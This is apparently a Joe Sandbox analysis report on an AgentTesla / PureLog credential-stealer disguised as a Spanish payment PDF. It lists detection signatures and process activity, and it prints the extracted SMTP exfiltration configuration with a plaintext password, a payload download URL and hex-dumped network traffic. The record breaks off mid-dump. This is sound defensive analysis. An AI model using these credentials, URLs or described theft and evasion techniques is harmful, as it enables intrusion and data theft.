Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
JUSTIFICANTE DE PAGO CF.pdf.exe

Overview

General Information

Sample name:JUSTIFICANTE DE PAGO CF.pdf.exe
Analysis ID:1396479
MD5:5d9f0ca0e2b0e41f30a1cce0b002484b
SHA1:1eb77e3633dcfbfd2163a8e9a0c0a3f2588c0b14
SHA256:344bb8ae2d9afbf9f666a844f6e9a7606eaa226a0383b84cf173f0f3725fabff
Tags:exe
Infos:

Detection

AgentTesla, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Yara detected AgentTesla
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Contains functionality to log keystrokes (.Net Source)
Creates multiple autostart registry keys
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Outbound SMTP Connections
Tries to load missing DLLs
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Reramvw.exe (PID: 7128 cmdline: "C:\Users\user\AppData\Roaming\Reramvw.exe" MD5: 5D9F0CA0E2B0E41F30A1CCE0B002484B)
    • Reramvw.exe (PID: 5844 cmdline: C:\Users\user\AppData\Roaming\Reramvw.exe MD5: 5D9F0CA0E2B0E41F30A1CCE0B002484B)
    • Reramvw.exe (PID: 6300 cmdline: C:\Users\user\AppData\Roaming\Reramvw.exe MD5: 5D9F0CA0E2B0E41F30A1CCE0B002484B)
  • repeat.exe (PID: 7056 cmdline: "C:\Users\user\AppData\Roaming\repeat\repeat.exe" MD5: 5D9F0CA0E2B0E41F30A1CCE0B002484B)
    • repeat.exe (PID: 5292 cmdline: C:\Users\user\AppData\Roaming\repeat\repeat.exe MD5: 5D9F0CA0E2B0E41F30A1CCE0B002484B)
  • Reramvw.exe (PID: 6472 cmdline: "C:\Users\user\AppData\Roaming\Reramvw.exe" MD5: 5D9F0CA0E2B0E41F30A1CCE0B002484B)
    • Reramvw.exe (PID: 6152 cmdline: C:\Users\user\AppData\Roaming\Reramvw.exe MD5: 5D9F0CA0E2B0E41F30A1CCE0B002484B)
  • repeat.exe (PID: 6844 cmdline: "C:\Users\user\AppData\Roaming\repeat\repeat.exe" MD5: 5D9F0CA0E2B0E41F30A1CCE0B002484B)
    • repeat.exe (PID: 2360 cmdline: C:\Users\user\AppData\Roaming\repeat\repeat.exe MD5: 5D9F0CA0E2B0E41F30A1CCE0B002484B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.wassadadvogados.com.br", "Username": "pinchoo@wassadadvogados.com.br", "Password": "{&0etBH,BRpf"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
JUSTIFICANTE DE PAGO CF.pdf.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\repeat\repeat.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      C:\Users\user\AppData\Roaming\Reramvw.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        0000000B.00000002.2413286495.00000000037CB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          00000003.00000002.2156621801.0000000003BBB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            00000003.00000002.2152875189.0000000002A7E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              00000003.00000002.2152875189.0000000002A7E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                00000000.00000002.1992000502.0000000003308000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  Click to see the 91 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.3383018.0.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    7.2.repeat.exe.2bf2c1c.1.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                      3.2.Reramvw.exe.3cd3160.7.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                        3.2.Reramvw.exe.3bbb5d0.2.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                          0.0.JUSTIFICANTE DE PAGO CF.pdf.exe.c50000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                            Click to see the 34 entries

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Suspicious Double Extension File Execution
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe, CommandLine: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe, NewProcessName: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe, OriginalFileName: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 6844, ProcessCommandLine: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe, ProcessId: 2360, ProcessName: JUSTIFICANTE DE PAGO CF.pdf.exe
                            Sigma detected: CurrentVersion Autorun Keys Modification
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Reramvw.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe, ProcessId: 2360, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Reramvw
                            Sigma detected: Suspicious Outbound SMTP Connections
                            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 191.252.141.106, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe, Initiated: true, ProcessId: 7164, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49708

                            Snort Signatures

                            No Snort rule has matched

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus / Scanner detection for submitted sample
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exeAvira: detected
                            Antivirus detection for dropped file
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeAvira: detection malicious, Label: HEUR/AGEN.1363658
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeAvira: detection malicious, Label: HEUR/AGEN.1363658
                            Found malware configuration
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.43d8c88.6.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.wassadadvogados.com.br", "Username": "pinchoo@wassadadvogados.com.br", "Password": "{&0etBH,BRpf"}
                            Multi AV Scanner detection for dropped file
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeReversingLabs: Detection: 34%
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeReversingLabs: Detection: 34%
                            Multi AV Scanner detection for submitted file
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exeReversingLabs: Detection: 34%
                            Machine Learning detection for dropped file
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeJoe Sandbox ML: detected
                            Machine Learning detection for sample
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exeJoe Sandbox ML: detected
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                            Source: unknownHTTPS traffic detected: 45.83.31.187:443 -> 192.168.2.5:49706 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 45.83.31.187:443 -> 192.168.2.5:49711 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 45.83.31.187:443 -> 192.168.2.5:49723 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 45.83.31.187:443 -> 192.168.2.5:49728 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 45.83.31.187:443 -> 192.168.2.5:49733 version: TLS 1.2
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: protobuf-net.pdbSHA256}Lq source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1996305112.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.000000000318D000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2152875189.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2233090518.00000000029FD000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2328135287.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2408937601.000000000271D000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: protobuf-net.pdb source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1996305112.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.000000000318D000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2152875189.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2233090518.00000000029FD000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2328135287.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2408937601.000000000271D000.00000004.00000800.00020000.00000000.sdmp

                            Networking

                            barindex
                            Yara detected Generic Downloader
                            Source: Yara matchFile source: JUSTIFICANTE DE PAGO CF.pdf.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.JUSTIFICANTE DE PAGO CF.pdf.exe.c50000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\repeat\repeat.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Reramvw.exe, type: DROPPED
                            Source: global trafficTCP traffic: 192.168.2.5:49708 -> 191.252.141.106:587
                            Source: global trafficHTTP traffic detected: GET /HCHP.pdf HTTP/1.1Host: qu.axConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /HCHP.pdf HTTP/1.1Host: qu.axConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /HCHP.pdf HTTP/1.1Host: qu.axConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /HCHP.pdf HTTP/1.1Host: qu.axConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /HCHP.pdf HTTP/1.1Host: qu.axConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /recepticle.aspx HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: www.example.comContent-Length: 25Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /recepticle.aspx HTTP/1.1Host: www.example.com
                            Source: global trafficHTTP traffic detected: POST /recepticle.aspx HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: www.example.comContent-Length: 25Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /recepticle.aspx HTTP/1.1Host: www.example.com
                            Source: global trafficHTTP traffic detected: POST /recepticle.aspx HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: www.example.comContent-Length: 25Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /recepticle.aspx HTTP/1.1Host: www.example.com
                            Source: global trafficHTTP traffic detected: POST /recepticle.aspx HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: www.example.comContent-Length: 25Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /recepticle.aspx HTTP/1.1Host: www.example.com
                            Source: global trafficHTTP traffic detected: POST /recepticle.aspx HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: www.example.comContent-Length: 25Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /recepticle.aspx HTTP/1.1Host: www.example.com
                            Source: Joe Sandbox ViewIP Address: 93.184.216.34 93.184.216.34
                            Source: Joe Sandbox ViewIP Address: 191.252.141.106 191.252.141.106
                            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                            Source: global trafficTCP traffic: 192.168.2.5:49708 -> 191.252.141.106:587
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: global trafficHTTP traffic detected: GET /HCHP.pdf HTTP/1.1Host: qu.axConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /HCHP.pdf HTTP/1.1Host: qu.axConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /HCHP.pdf HTTP/1.1Host: qu.axConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /HCHP.pdf HTTP/1.1Host: qu.axConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /HCHP.pdf HTTP/1.1Host: qu.axConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /recepticle.aspx HTTP/1.1Host: www.example.com
                            Source: global trafficHTTP traffic detected: GET /recepticle.aspx HTTP/1.1Host: www.example.com
                            Source: global trafficHTTP traffic detected: GET /recepticle.aspx HTTP/1.1Host: www.example.com
                            Source: global trafficHTTP traffic detected: GET /recepticle.aspx HTTP/1.1Host: www.example.com
                            Source: global trafficHTTP traffic detected: GET /recepticle.aspx HTTP/1.1Host: www.example.com
                            Source: unknownDNS traffic detected: queries for: www.example.com
                            Source: unknownHTTP traffic detected: POST /recepticle.aspx HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: www.example.comContent-Length: 25Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: max-age=604800Content-Type: text/html; charset=UTF-8Date: Wed, 21 Feb 2024 20:08:48 GMTExpires: Wed, 28 Feb 2024 20:08:48 GMTServer: EOS (vny/0451)Content-Length: 433Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 2f 6f 62 6a 2e 61 63 2e 62 63 6f 6e 2e 65 63 64 6e 73 2e 6e 65 74 2f 65 63 5f 74 70 6d 5f 62 63 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>404 - Not Found</title></head><body><h1>404 - Not Found</h1><script type="text/javascript" src="//obj.ac.bcon.ecdns.net/ec_tpm_bcon.js"></script></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccept-Ranges: bytesAge: 366073Cache-Control: max-age=604800Content-Type: text/html; charset=UTF-8Date: Wed, 21 Feb 2024 20:08:50 GMTExpires: Wed, 28 Feb 2024 20:08:50 GMTLast-Modified: Sat, 17 Feb 2024 14:27:37 GMTServer: ECS (nyb/1D29)Vary: Accept-EncodingX-Cache: 404-HITContent-Length: 1256Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 30 66 30 66 32 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 7d 0a 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 65 6d 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 64 66 64 66 66 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 2e 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 32 70 78 20 33 70 78 20 37 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 32 29 3b 0a 20 20 20 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 2c 20 61 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 38 34 38 38 66 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 20 20 20 20 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 2
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: max-age=604800Content-Type: text/html; charset=UTF-8Date: Wed, 21 Feb 2024 20:09:04 GMTExpires: Wed, 28 Feb 2024 20:09:04 GMTServer: EOS (vny/0451)Content-Length: 433Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 2f 6f 62 6a 2e 61 63 2e 62 63 6f 6e 2e 65 63 64 6e 73 2e 6e 65 74 2f 65 63 5f 74 70 6d 5f 62 63 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>404 - Not Found</title></head><body><h1>404 - Not Found</h1><script type="text/javascript" src="//obj.ac.bcon.ecdns.net/ec_tpm_bcon.js"></script></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccept-Ranges: bytesAge: 366089Cache-Control: max-age=604800Content-Type: text/html; charset=UTF-8Date: Wed, 21 Feb 2024 20:09:06 GMTExpires: Wed, 28 Feb 2024 20:09:06 GMTLast-Modified: Sat, 17 Feb 2024 14:27:37 GMTServer: ECS (nyb/1D29)Vary: Accept-EncodingX-Cache: 404-HITContent-Length: 1256Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 30 66 30 66 32 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 